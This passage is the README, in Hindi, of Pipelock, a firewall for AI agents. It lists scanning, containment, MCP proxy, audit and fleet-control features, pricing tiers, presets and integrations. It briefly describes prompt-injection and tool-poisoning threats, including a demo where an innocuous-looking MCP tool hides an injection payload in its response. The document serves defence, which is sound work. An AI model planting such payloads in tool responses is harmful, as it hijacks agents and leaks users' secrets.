- **सुरक्षा मूल्यांकन:** `pipelock assess init`, `pipelock assess run`, और `pipelock assess finalize` हमले सिमुलेशन, कॉन्फ़िग स्कोरिंग, इंस्टॉल सत्यापन, और MCP खोज को एक पुनरुत्पादक साक्ष्य बंडल में ऑर्केस्ट्रेट करते हैं। असुरक्षित MCP सर्वर जैसे क्रिटिकल एक्सपोज़र संख्यात्मक स्कोर की परवाह किए बिना ग्रेड को कैप करते हैं। मुफ्त सारांश आपका ग्रेड, अनुभाग स्कोर, और शीर्ष निष्कर्ष दिखाता है; एक लाइसेंस सर्वर-विशिष्ट निष्कर्ष, उपचार कमांड, और Ed25519-हस्ताक्षरित साक्ष्य के साथ पूर्ण रिपोर्ट अनलॉक करता है।
<details>
<summary>अधिक सुविधाएँ</summary>
| सुविधा | यह क्या करता है |
|---------|-------------|
| **ऑडिट रिपोर्ट** | `pipelock report --input events.jsonl` HTML/JSON/बंडल रिपोर्ट जोखिम रेटिंग, टाइमलाइन, और साक्ष्य परिशिष्ट के साथ उत्पन्न करता है। `--sign` के साथ Ed25519 हस्ताक्षर। ([नमूना रिपोर्ट](https://github.com/luckypipewrench/pipelock/blob/HEAD/examples/sample-report.html)) |
| **निदान** | `pipelock diagnose` बिना नेटवर्क के आपके कॉन्फ़िग को एंड-टू-एंड सत्यापित करने के लिए 7 स्थानीय जांच चलाता है। |
| **प्रवर्तन डॉक्टर** (v2.5) | `pipelock doctor` प्रॉक्सीिंग, TLS इंटरसेप्शन, अनुरोध-बॉडी स्कैनिंग, ब्राउज़र शील्ड, MCP रैपिंग, MCP बाइनरी अखंडता, टूल प्रोवेनेंस, file_sentry, Sentry, और तैनाती-सीमा संकेतों के लिए कॉन्फ़िगर्ड-बनाम-प्रवर्तनीय स्थिति रिपोर्ट करता है। |
| **अनुरोध बॉडी इंजेक्शन अवरोधन** (v2.5) | अनुरोध-बॉडी प्रॉम्प्ट-इंजेक्शन और क्रिटिकल-DLP निष्कर्ष फॉरवर्ड, रिवर्स, TLS-इंटरसेप्ट, और WebSocket ट्रांसपोर्ट पर एनफोर्स मोड में गैर-प्रदाता गंतव्यों को हार्ड-ब्लॉक करते हैं, ऑपरेटर-दृश्यमान निदान के लिए ब्लॉक-कारण हेडर के साथ। |
| **अनुरोध नीति** (v2.6) | आउटबाउंड API संचालन पर डिफ़ॉल्ट रूप से अनुमति दें/अस्वीकार/चेतावनी रेल: मार्ग प्लस GraphQL संचालन विधेय से मेल करें, JSON `$batch` लिफाफों में पुनरावर्तन करें, अपार्सेबल या अपारदर्शी निकायों पर बंद विफल हों, और अनुबंध गेट से पहले चलें। देखें [अनुरोध नीति गाइड](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/request-policy.md) |
| **TLS इंटरसेप्शन** | वैकल्पिक CONNECT टनल MITM: डिक्रिप्ट करें, बॉडी/हेडर/प्रतिक्रियाएं स्कैन करें, पुनः एन्क्रिप्ट करें। `pipelock tls init` एक CA उत्पन्न करता है, फिर `pipelock tls install-ca` प्लेटफ़ॉर्म ट्रस्ट-स्टोर इंस्टॉल चरण प्रिंट करता है। |
| **ब्लॉक संकेत** | ऑप्ट-इन `explain_blocks: true` अवरुद्ध प्रतिक्रियाओं में फिक्स सुझाव जोड़ता है। |
| **प्रोजेक्ट ऑडिट** | `pipelock audit ./project` सुरक्षा जोखिमों के लिए स्कैन करता है और एक अनुकूलित कॉन्फ़िग उत्पन्न करता है। |
| **कॉन्फ़िग स्कोरिंग** (v2.6) | `pipelock audit score --config pipelock.yaml` 23 श्रेणियों में 170-पॉइंट बजट और लेटर ग्रेड के साथ सुरक्षा पोस्चर का मूल्यांकन करता है। |
| **फ़ाइल अखंडता** | SHA256 मैनिफेस्ट संशोधित, जोड़े गए, या हटाए गए वर्कस्पेस फ़ाइलों का पता लगाते हैं। |
| **Git सुरक्षा** | `git diff \| pipelock git scan-diff` कमिट से पहले रहस्यों को पकड़ता है। |
| **Ed25519 हस्ताक्षर** | मल्टी-एजेंट विश्वास के लिए कुंजी प्रबंधन, फ़ाइल हस्ताक्षर, और हस्ताक्षर सत्यापन। |
| **सत्र प्रोफाइलिंग** | डोमेन बर्स्ट और वॉल्यूम स्पाइक के लिए प्रति-सत्र व्यवहारिक विश्लेषण। |
| **अनुकूली प्रवर्तन** | चेतावनी से ब्लॉक तक वृद्धि, डी-एस्केलेशन टाइमर, और डोमेन बर्स्ट पहचान के साथ प्रति-सत्र खतरा स्कोर। |
| **अनुकूली ऑपरेटर CLI** (v2.5) | `pipelock adaptive status / flush / whoami` प्रमाणित एडमिन API के माध्यम से रनटाइम अनुकूली स्थिति को उजागर करता है। देखें [`docs/cli/adaptive.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/adaptive.md) |
| **निष्कर्ष दमन** | कॉन्फ़िग नियमों या इनलाइन `pipelock:ignore` टिप्पणियों के माध्यम से ज्ञात झूठी सकारात्मकताओं को शांत करें। |
| **मल्टी-एजेंट समर्थन** | प्रति-एजेंट फ़िल्टरिंग के लिए `X-Pipelock-Agent` हेडर के माध्यम से एजेंट पहचान। |
| **फ्लीट मॉनिटरिंग** | प्रति-इंस्टेंस Prometheus मीट्रिक प्लस आयात करने के लिए तैयार [Grafana डैशबोर्ड](https://github.com/luckypipewrench/pipelock/blob/HEAD/configs/grafana-dashboard.json)। मुफ्त एकल-इंस्टेंस मॉनिटरिंग, कंडक्टर से अलग। |
| **ऑपरेटर डैशबोर्ड** (v3.1, Pro/Enterprise) | `pipelock dashboard serve` टोकन, OIDC, या mTLS प्रमाणीकरण, सीमित RBAC, रॉ-व्यू एलिवेशन, बैकअप/रीस्टोर, छूट जीवनचक्र रिकॉर्ड, और कवरेज प्रमाणपत्र के साथ रीड-ओनली अवलोकन, साक्ष्य, छूट, एजेंट, बजट, विश्वास और कुंजी, फ्लीट, वर्कबेंच, और घटना दृश्य देता है। देखें [`docs/cli/dashboard.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/dashboard.md) |
| **मुफ्त साक्ष्य दर्शक** (v3.1) | `pipelock evidence serve` बिना लाइसेंस और बिना क्रॉस-एजेंट गणना के एक चयनित रिकॉर्डर सत्र को रीड-ओनली HTML रिपोर्ट के रूप में प्रस्तुत करता है। `pipelock evidence verify-cert` Pro द्वारा जारी कवरेज प्रमाणपत्रों को ऑफ़लाइन सत्यापित करता है। |
| **कंडक्टर: फ्लीट कंट्रोल प्लेन** (v2.7, Enterprise) | हस्ताक्षरित पॉलिसी-बंडल वितरण, हस्ताक्षरित-साक्ष्य ऑडिट सिंक (`pipelock fleet-sink`), नामांकन, रिमोट किल, पॉलिसी रोलबैक, ड्राई-रन, निर्णय पुनर्चालन, और mTLS/SPIFFE पर रनटाइम/एप्लाई-स्टेट ड्रिफ्ट प्रीफ्लाइट। `fleet` लाइसेंस सुविधा द्वारा गेटेड; स्टेल-पॉलिसी व्यवहार स्पष्ट है और डिफ़ॉल्ट रूप से सख्त अस्वीकृति है। देखें [कंडक्टर गाइड](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/conductor.md) |
| **A2A स्कैनिंग** | Google के एजेंट-टू-एजेंट प्रोटोकॉल के लिए फॉरवर्ड/MCP पथों पर एजेंट कार्ड विषाक्तता पहचान, कार्ड ड्रिफ्ट मॉनिटरिंग, और सत्र तस्करी रोकथाम। |
| **व्यवहारिक आधाररेखा** | `pipelock baseline list/show/ratify/forget` के साथ MCP टूल व्यवहार के लिए प्रोफ़ाइल-फिर-लॉक, ऑपरेटर अनुमोदन और पुनर्सीखने के लिए। देखें [`docs/cli/baseline.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/baseline.md) |
| **डिनायल-ऑफ-वॉलेट** | कुल टूल कॉल, एक ही टूल के रीट्राई, लूप/चक्र पहचान, और दीवार-घड़ी अवधि के लिए प्रति-एजेंट MCP बजट। |
| **दूषण वृद्धि** | विश्वास बहाल होने तक MCP और कार्य सीमाओं में एक्सपोज़र-आधारित नीति वृद्धि। |
| **मध्यस्थता लिफाफा** | आने वाले सत्यापन, रिप्ले सुरक्षा, SPIFFE अभिनेता प्रारूप, और RFC 9421 हस्ताक्षर-कुंजी निर्देशिका के साथ अग्रेषित HTTP अनुरोधों और MCP `_meta` पर RFC 8941 साइडबैंड मेटाडेटा। देखें [फेडरेशन गाइड](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/federation.md) |
| **रसीद अनुरूपता** | स्वतंत्र Go, TypeScript, Rust, और Python कार्यान्वयन में क्रॉस-इम्प्लीमेंटेशन रसीद सत्यापन सूट (`sdk/conformance/`), प्लस Go द्वारा समर्थित ब्राउज़र wasm सतह। `EvidenceReceipt v2` RFC 8785/JCS कैनोनिकलाइज़ेशन का उपयोग करता है। AARP/SVID मूल्यांकन ऑफ़लाइन सत्यापक-पक्ष रहता है। |
| **लर्न-एंड-लॉक** (v2.4) | प्रति-एजेंट व्यवहारिक अनुबंध: ट्रैफ़िक का निरीक्षण करें, एक हस्ताक्षरित उम्मीदवार अनुबंध संकलित करें, छाया में कैप्चर किए गए अवलोकनों को फिर से चलाएं, प्रति नियम अनुमोदन करें, हस्ताक्षरित सक्रिय मैनिफेस्ट को बढ़ावा दें, और URL-युक्त ट्रांसपोर्ट प्लस MCP टूल कॉल पर लाइव प्रवर्तन करें। देखें [लर्न-एंड-लॉक गाइड](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/learn-and-lock.md) |
| **ब्लॉक-कारण हेडर** (v2.4) | HTTP-सक्षम ब्लॉक पथों पर `X-Pipelock-Block-Reason`, MCP JSON-RPC त्रुटि मेटाडेटा पर समान कारण शब्दावली के साथ। देखें [ब्लॉक-कारण हेडर](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/block-reason-header.md) |
| **वेज-डिटेक्शन वॉचडॉग** (v2.4) | `health_watchdog` `/health` 503 लौटाता है जब कोई सबसिस्टम हार्टबीट पुराना हो जाता है। देखें [स्वास्थ्य एंडपॉइंट गाइड](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/health.md) |
| **रिडक्शन प्रदाता प्लगइन आकार** (v2.4) | Anthropic, OpenAI, और Gemini चैट API के लिए प्रथम-पक्ष रिडक्शन पार्सर, तृतीय-पक्ष पार्सर के लिए प्रदाता-प्लगइन आकार के साथ। |
| **ऑडिट पैकेट v0 स्कीमा + सत्यापक** (v2.5) | Go, TypeScript, और Rust सत्यापक कार्यान्वयन के साथ प्रथम-पक्ष कैनोनिकल ऑडिट पैकेट स्कीमा, प्लस स्टैंडअलोन [`pipelock-verifier`](https://github.com/luckypipewrench/pipelock/blob/HEAD/cmd/pipelock-verifier/) CLI। स्कीमा [`sdk/audit-packet/`](https://github.com/luckypipewrench/pipelock/blob/HEAD/sdk/audit-packet/) के अंतर्गत रहता है; सत्यापक पैकेज [`sdk/verifiers/`](https://github.com/luckypipewrench/pipelock/blob/HEAD/sdk/verifiers/) के अंतर्गत रहते हैं। |
| **होस्ट कंटेनमेंट जीवनचक्र** (v2.5) | `pipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh` 3-UID कंटेनमेंट मॉडल प्रबंधित करता है। देखें [`docs/contain-cli.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/contain-cli.md) |
| **MCP अखंडता मैनिफेस्ट** (v2.5) | `pipelock mcp integrity manifest generate / verify / sign / verify-signature` हैश द्वारा MCP सर्वर बाइनरी/स्क्रिप्ट को पिन करता है और सबप्रोसेस लॉन्च से पहले एक विश्वसनीय मैनिफेस्ट हस्ताक्षर की आवश्यकता हो सकती है। देखें [`docs/cli/mcp-integrity.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/mcp-integrity.md) |
| **Kubernetes MCP लॉन्चर अनुबंध** (v2.5) | `pipelock init sidecar --mcp-upstream` साथी लिसनर कॉन्फ़िगरेशन, सेवा पोर्ट, वर्कलोड एनोटेशन, NetworkPolicy अनुमति, `PIPELOCK_MCP_PROXY_URL`, और माउंटेड `PIPELOCK_MCP_CONFIG` जारी करता है। देखें [`docs/cli/init-sidecar.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/init-sidecar.md) |
| **फेडरेशन सख्त मोड** (v2.5) | इनबाउंड मध्यस्थता-लिफाफा सत्यापन को डिफ़ॉल्ट रूप से SPIFFE-प्रारूप अभिनेताओं की आवश्यकता होती है, अनुबंध कब्र के पत्थर लागू होते हैं, और `pipelock envelope trust add/list/remove/verify` स्थानीय विश्वास का प्रबंधन करता है। देखें [फेडरेशन गाइड](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/federation.md) |
| **मीडिया नीति** | JPEG/PNG से स्टेग्नोग्राफ़िक मेटाडेटा को हटाता है, डिफ़ॉल्ट रूप से ऑडियो/वीडियो को अस्वीकार करता है, SVG सक्रिय सामग्री को कठोर करता है, और इमेज आकार सीमाएं लागू करता है। देखें [मीडिया नीति](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/media-policy.md) |
| **अनुपालन मैपिंग** | OWASP MCP Top 10, OWASP Agentic Top 15, OWASP LLM Top 10, NIST 800-53, EU AI Act, और खरीद/ऑडिट मैपिंग। |
</details>
---
## मुफ्त, Pro, और Enterprise
सभी पहचान, प्रवर्तन, कंटेनमेंट, और एकल-एजेंट साक्ष्य Apache 2.0 के तहत हमेशा मुफ्त है। भुगतान वाले स्तर मल्टी-एजेंट समन्वय (Pro) और फ्लीट गवर्नेंस प्लस अनुपालन (Enterprise) जोड़ते हैं।
| क्षमता | Free | Pro | Enterprise |
|---|:--:|:--:|:--:|
| स्कैनिंग और पहचान (क्रमबद्ध URL पाइपलाइन, DLP, इंजेक्शन, SSRF, स्ट्रीमिंग SSE, रिडक्शन, पता सुरक्षा) | हाँ | हाँ | हाँ |
| MCP और A2A स्कैनिंग (इनपुट, प्रतिक्रिया, टूल पॉलिसी, टूल चेन, विषाक्तता, अखंडता, प्रमाणित श्रोता) | हाँ | हाँ | हाँ |
| कंटेनमेंट, सैंडबॉक्स, होस्ट `contain`, 6-स्रोत किल स्विच | हाँ | हाँ | हाँ |
| कार्रवाई रसीद, फ्लाइट रिकॉर्डर, एंकर, मुफ्त साक्ष्य दर्शक, `verify-cert`, स्टैंडअलोन सत्यापक | हाँ | हाँ | हाँ |
| कैनरी टोकन, कौशल-स्कैन, `explain`, एकल-इंस्टेंस Prometheus और Grafana | हाँ | हाँ | हाँ |
| प्रति-एजेंट प्रोफ़ाइल: पहचान, बजट, कॉन्फ़िग और स्कैनर आइसोलेशन, प्रति-एजेंट सैंडबॉक्स | नहीं | हाँ | हाँ |
| स्रोत CIDR और नेटवर्क सेलेक्टर द्वारा प्रति-एजेंट रूटिंग | नहीं | हाँ | हाँ |
| ऑपरेटर डैशबोर्ड: अवलोकन, साक्ष्य, छूट, एजेंट, बजट, विश्वास और कुंजी | नहीं | हाँ | हाँ |
| प्रति-एजेंट कवरेज प्रमाणपत्र | नहीं | हाँ | हाँ |
| कानूनी रोक और अनुपालन मेटाडेटा | नहीं | हाँ | हाँ |
| कंडक्टर फ्लीट कंट्रोल प्लेन, `fleet-sink` ऑडिट सिंक, रिमोट किल, रोलबैक, निर्णय पुनर्चालन, ड्रिफ्ट प्रीफ्लाइट | नहीं | नहीं | हाँ |
| mTLS अनुयायी नामांकन और रोस्टर-सत्यापित हस्ताक्षरित पॉलिसी वितरण | नहीं | नहीं | हाँ |
| डैशबोर्ड फ्लीट दृश्य: फ्लीट, वर्कबेंच, घटना | नहीं | नहीं | हाँ |
हस्ताक्षरित `pipelock assess` रिपोर्ट एक अलग `assess` पात्रता है, जो Pro और Enterprise से स्वतंत्र है। मुफ्त assess ग्रेड अपरिवर्तित है।
---
## यह कैसे काम करता है
Pipelock **क्षमता पृथक्करण** का उपयोग करता है: एक प्रवर्तित तैनाती में, एजेंट प्रक्रिया के पास रहस्य हैं लेकिन कोई प्रत्यक्ष नेटवर्क पहुंच नहीं है। Pipelock के पास नेटवर्क पहुंच है लेकिन कोई एजेंट रहस्य नहीं। भले ही एजेंट को प्रॉम्प्ट-इंजेक्ट किया जाए, वह फ़ायरवॉल के नियंत्रणों तक नहीं पहुंच सकता।
तीन HTTP प्रॉक्सी मोड (समान पोर्ट), प्लस एक समर्पित MCP प्रॉक्सी और फॉरवर्ड और MCP पथों पर A2A निरीक्षण:
- **फ़ेच प्रॉक्सी** (`/fetch?url=...`): URL प्राप्त करता है, टेक्स्ट निकालता है, इंजेक्शन के लिए स्कैन करता है, साफ सामग्री लौटाता है।
- **फॉरवर्ड प्रॉक्सी** (`HTTPS_PROXY`): एप्लिकेशन कोड परिवर्तनों के बिना मानक HTTP CONNECT टनलिंग। प्रॉक्सी कॉन्फ़िगरेशन अभी भी आवश्यक है। वैकल्पिक TLS इंटरसेप्शन पेलोड स्कैनिंग सक्षम करता है।
- **WebSocket प्रॉक्सी** (`/ws?url=ws://...`): DLP + इंजेक्शन पहचान के साथ द्विदिश फ्रेम स्कैनिंग।
- **MCP प्रॉक्सी** (`pipelock mcp proxy`): stdio या HTTP MCP सर्वर को द्विदिश स्कैनिंग के साथ लपेटता है।
- **A2A निरीक्षण**: फॉरवर्ड और MCP पथों को पार करते समय Google एजेंट-टू-एजेंट प्रोटोकॉल ट्रैफ़िक का निरीक्षण करता है।

<details>
<summary>टेक्स्ट आरेख (टर्मिनलों के लिए)</summary>```
┌──────────────────────────────────────────────────────────┐
│ PRIVILEGED ZONE │
│ │
│ AI Agent │
│ - API keys, credentials, private code and context │
│ - Network-isolated by deployment │
└────────────────────────────┬─────────────────────────────┘
│ mediated request
│ fetch / CONNECT / WS / MCP / A2A
▼
┌──────────────────────────────────────────────────────────┐
│ FIREWALL ZONE │
│ │
│ Pipelock Agent Firewall │
│ - Destination: URL, SSRF, and DNS checks │
│ - Data: DLP, secret detection, and budgets │
│ - Content: prompt injection and tool poisoning │
│ - Policy: allow, block, or redact │
│ - No agent secrets │
└────────────────────────────┬─────────────────────────────┘
│ approved request
▼
┌──────────────────────────────────────────────────────────┐
│ INTERNET │
│ │
│ Web APIs, websites, MCP servers, tools, and A2A services │
└──────────────────────────────────────────────────────────┘
Internet -- response --> Pipelock -- scanned content --> AI Agent
कॉन्फ़िगरेशन
बिल्ट-इन प्रीसेट से एक कॉन्फ़िग उत्पन्न करें, या pipelock audit को अपने प्रोजेक्ट के अनुसार एक तैयार करने दें:```bash
pipelock presets
pipelock generate config --list
pipelock generate config --preset balanced > pipelock.yaml
pipelock audit ./my-project -o pipelock.yaml
| CLI प्रीसेट | मोड | क्रिया | सर्वोत्तम उपयोग |
|------------|------|--------|----------|
| `balanced` | balanced | warn | सामान्य उपयोग (डिफ़ॉल्ट) |
| `strict` | strict | block | उच्च-सुरक्षा, विनियमित उद्योग |
| `audit` | audit | warn | केवल लॉग मूल्यांकन |
| `claude-code` | balanced | block | Claude Code बिना निगरानी |
| `cursor` | balanced | block | कर्सर आईडीई |
| `generic-agent` | balanced | warn | ट्यूनिंग के दौरान नए एजेंट |
| `hostile-model` | strict | block | Uncensored/abliterated models |
कॉन्फ़िग बदलाव फ़ाइल वॉचर या SIGHUP के माध्यम से उठाए जाते हैं। पूर्ण संदर्भ: **[docs/configuration.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/configuration.md)**
गलत सकारात्मक ट्यूनिंग के लिए: **[docs/false-positive-tuning.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/false-positive-tuning.md)**
---
## एकीकरण गाइड
- **[Claude Code](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/claude-code.md):** MCP प्रॉक्सी सेटअप, `.claude.json` कॉन्फ़िगरेशन
- **[OpenAI Codex](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/codex.md):** MCP प्रॉक्सी रैपिंग, फ़ॉरवर्ड प्रॉक्सी, सैंडबॉक्स एकीकरण
- **[Cline](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/cline.md):** Cline के `mcp.json` के लिए MCP प्रॉक्सी रैपिंग
- **[OpenCode](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/opencode.md):** OpenCode के स्थानीय और रिमोट MCP सर्वर्स के लिए MCP प्रॉक्सी रैपिंग
- **[Zed](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/zed.md):** Zed के `settings.json` में `context_servers` ब्लॉक के लिए MCP प्रॉक्सी रैपिंग
- **[OpenAI Agents SDK](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/openai-agents.md):** `MCPServerStdio`, मल्टी-एजेंट हैंडऑफ़
- **[Google ADK](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/google-adk.md):** `McpToolset`, `StdioConnectionParams`
- **[AutoGen](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/autogen.md):** `StdioServerParams`, `mcp_server_tools()`
- **[CrewAI](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/crewai.md):** `MCPServerStdio` रैपिंग, `MCPServerAdapter`
- **[LangGraph](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/langgraph.md):** `MultiServerMCPClient`, `StateGraph`
- **[Hermes](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/hermes.md):** Nous Research के एजेंट के लिए फ़ुल-प्लगइन कवरेज या हल्का MCP-ओनली रैपिंग, ऑथ-हेडर साइडकार संरक्षण के साथ
- **[JetBrains/Junie](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/jetbrains.md):** IntelliJ, PyCharm, GoLand के लिए MCP प्रॉक्सी रैपिंग ([वॉकथ्रू](https://pipelab.org/learn/jetbrains-integration/))
- **Cursor:** `pipelock cursor install` Pipelock को शेल निष्पादन, MCP टूल कॉल और फ़ाइल रीड के लिए Cursor हुक के रूप में पंजीकृत करता है; एक मान्य नीति पथ एम्बेड करने के लिए `--config` का उपयोग करें और Pipelock-प्रबंधित हुक हटाने के लिए `pipelock cursor remove` का उपयोग करें। आप [Claude Code](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/claude-code.md) के समान MCP प्रॉक्सी पैटर्न के साथ `configs/cursor.yaml` का भी उपयोग कर सकते हैं ([वॉकथ्रू](https://pipelab.org/learn/cursor-integration/))
- **VS Code:** `pipelock vscode install` प्रत्येक MCP सर्वर को MCP प्रॉक्सी के माध्यम से रूट करने के लिए `.vscode/mcp.json` को फिर से लिखता है; `--global` उपयोगकर्ता-स्तरीय `mcp.json` को लक्षित करता है
- **[OpenClaw](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/openclaw.md):** गेटवे साइडकार, इनिट कंटेनर, कॉन्फ़िग रैपिंग
- **कोई अन्य MCP क्लाइंट:** `pipelock generate mcporter` किसी भी JSON फ़ाइल को शीर्ष-स्तरीय `mcpServers` ऑब्जेक्ट के साथ पढ़ता है और प्रत्येक सर्वर को Pipelock के प्रॉक्सी के माध्यम से रैप करता है, ताकि उपरोक्त सूची में न होने वाला क्लाइंट भी एक कमांड में स्कैनिंग के माध्यम से रूट हो।
---
## परिनियोजन```bash
# Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest
docker run -p 8888:8888 -v ./pipelock.yaml:/config/pipelock.yaml:ro \
ghcr.io/luckypipewrench/pipelock:latest \
run --config /config/pipelock.yaml --listen 0.0.0.0:8888
# Network-isolated agent with Docker Compose
pipelock generate docker-compose --agent claude-code -o docker-compose.yaml
docker compose up
# Kubernetes with Helm
helm install pipelock charts/pipelock/
डॉकर कंपोज़, कुबेरनेट्स साइडकार + नेटवर्कपॉलिसी, iptables/nftables और macOS PF के लिए उत्पादन रेसिपी: docs/guides/deployment-recipes.md
CI एकीकरण```yaml
.github/workflows/pipelock.yaml
- uses: luckyPipewrench/pipelock@v2 with: scan-diff: 'true' fail-on-findings: 'true'
यह कार्रवाई एक पूर्व-निर्मित बाइनरी डाउनलोड करती है, `pipelock audit` चलाती है, PR diff में लीक हुए रहस्यों को स्कैन करती है, और ऑडिट रिपोर्ट को वर्कफ़्लो आर्टिफ़ैक्ट के रूप में अपलोड करती है। पूर्ण वर्कफ़्लो के लिए [`examples/ci-workflow.yaml`](https://github.com/luckypipewrench/pipelock/blob/HEAD/examples/ci-workflow.yaml) देखें।
### रन करने योग्य डेमो: टूल-रिस्पॉन्स इंजेक्शन
[`examples/tool-response-injection/`](https://github.com/luckypipewrench/pipelock/blob/HEAD/examples/tool-response-injection/) हार्नेस एक एंड-टू-एंड डेमो चलाता है जहां एक हानिरहित नाम और विवरण वाला MCP टूल अपने रिस्पॉन्स में एक प्रॉम्प्ट-इंजेक्शन पेलोड छुपाता है। Pipelock एजेंट तक पहुंचने से पहले रिस्पॉन्स को ब्लॉक कर देता है और हस्ताक्षरित कार्रवाई रसीदें जारी करता है जिन्हें कोई तीसरा पक्ष सत्यापित कर सकता है। यही डेमो एक साझा साइनिंग कुंजी के साथ तीन ट्रांसपोर्ट पर चलता है:
- MCP stdio
- MCP HTTP upstream
- HTTP fetch```bash
cd examples/tool-response-injection
python3 demo.py # needs python3 + cryptography + pipelock on PATH
सामुदायिक नियम
पता लगाना जिसे आप कोर बाइनरी से तेज़ी से विस्तारित, साझा और वितरित कर सकते हैं।
Pipelock का बिल्ट-इन DLP, इंजेक्शन और टूल-पॉइज़न का पता लगाना आउट ऑफ द बॉक्स मजबूत है। सामुदायिक नियम बंडल आपको और आगे जाने देते हैं: अपने स्टैक द्वारा देखे जाने वाले एक्सफ़िल्ट्रेशन आकार, गुप्त प्रारूप और इंजेक्शन ट्रिक्स के लिए अपने पैटर्न जोड़ें, उन पर हस्ताक्षर करें, और उन्हें एक ऐसी ताल पर वितरित करें जिसे आप नियंत्रित करते हैं, बजाय एक रिलीज़ की प्रतीक्षा करने के।
आधिकारिक बंडल को एक पंक्ति में स्थापित करें:```bash pipelock rules install pipelock-community
नियम बंडल हस्ताक्षरित और संस्करण-लॉक किए गए हैं। पूरा जीवनचक्र एक शिप की गई कमांड है, कोई कॉन्फ़िग संपादन नहीं:```bash
pipelock rules list # what is installed
pipelock rules diff pipelock-community # what a new version would change
pipelock rules update pipelock-community
pipelock rules verify # confirm signatures against the trusted keyring
pipelock rules remove pipelock-community
अपना खुद का लिखें। एक नियम एक छोटा YAML प्रविष्टि है जिसमें एक नाम, एक श्रेणी (DLP, injection, या tool-poison) और एक पैटर्न होता है। इसे अपनी कुंजी से हस्ताक्षर करें, इसे एक बंडल में डालें, और आपके द्वारा चलाया जाने वाला हर Pipelock इंस्टेंस इसे उठा लेता है। इसे समुदाय के साथ साझा करें और यह बाकी सभी की भी रक्षा करता है।
सार्वजनिक pipelock-rules बंडल में एक नियम का योगदान करें, या अपना खुद का बनाने और हस्ताक्षर करने के लिए docs/rules.md पढ़ें।
दस्तावेज़
पूर्ण दस्तावेज़ निर्देशिका: docs/
| दस्तावेज़ | इसमें क्या है |
|---|---|
| कॉन्फ़िगरेशन संदर्भ | सभी कॉन्फ़िग फ़ील्ड, डिफ़ॉल्ट, हॉट-रिलोड व्यवहार, प्रीसेट |
| अनुरोध नीति | आउटबाउंड API संचालन (GraphQL / discriminator / batch) पर डिफ़ॉल्ट-द्वारा-अनुमति दें/चेतावनी रेल, फेल-क्लोज्ड (v2.6) |
| अनुरोध रिडक्शन | HTTP, WebSocket, और MCP ट्रांसपोर्ट में JSON अनुरोध पुनर्लेखन |
| गलत सकारात्मक ट्यूनिंग | स्कैनर निष्कर्षों की पहचान, दमन और ट्यूनिंग |
| स्कैन API | प्रोग्रामेटिक स्कैनिंग के लिए मूल्यांकन एंडपॉइंट |
| तैनाती रेसिपी | Docker Compose, K8s साइडकार, iptables, macOS PF |
pipelock doctor | प्रॉक्सी, TLS, MCP, file_sentry, टेलीमेट्री, और कंटेनमेंट सिग्नल के लिए कॉन्फ़िगर्ड-बनाम-प्रवर्तनीय तैनाती निदान |
pipelock dashboard | ऑपरेटर डैशबोर्ड सेटअप: प्रमाणीकरण मोड, RBAC अनुमतियाँ, साक्ष्य, छूट, बजट, ट्रस्ट और कुंजियाँ, फ्लीट दृश्य, बैकअप/पुनर्स्थापना, और कवरेज प्रमाणपत्र |
pipelock verify-install | निर्धारणात्मक स्कैनिंग, स्थानीय प्रमाण, और प्रत्यक्ष-एग्रेस स्मोक जाँच |
pipelock update | सत्यापित स्व-अपडेट: हस्ताक्षरित रिलीज़ मेनिफेस्ट, चेकसम सत्यापन, वैकल्पिक cosign क्रॉस-चेक, परमाणु स्थापना, रोलबैक |
| बायपास प्रतिरोध | ज्ञात चोरी तकनीक, शमन, सीमाएँ |
| अवरुद्ध ज्ञात हमले | पुनरुत्पादन स्निपेट के साथ वास्तविक हमले |
| SIEM एकीकरण | लॉग स्कीमा, CEF/syslog आउटपुट, टिकाऊ एंटरप्राइज़ फ़ॉरवर्डिंग, जीवनचक्र, मीट्रिक्स, SIEM क्वेरीज़ |
| मीट्रिक्स संदर्भ | Prometheus मीट्रिक परिवार, लेबल, JSON आँकड़े, और अलर्ट नियम |
| सामुदायिक नियम | हस्ताक्षरित नियम बंडल स्थापित करें, कॉन्फ़िगर करें और बनाएं |
| सुरक्षा आश्वासन | सुरक्षा मॉडल, विश्वास सीमाएँ, आपूर्ति श्रृंखला |
| सुरक्षा दस्तावेज़ | प्रकटीकरण नीति, असमर्थित पथ, कुंजी रोटेशन, TLS CA और ऑडिट पैकेट खतरा मॉडल |
| एंटरप्राइज़ तत्परता | शिप किए गए एंटरप्राइज़ नियंत्रण, मूल्यांकन पथ, तैनाती निर्णय, और स्पष्ट सीमाएँ |
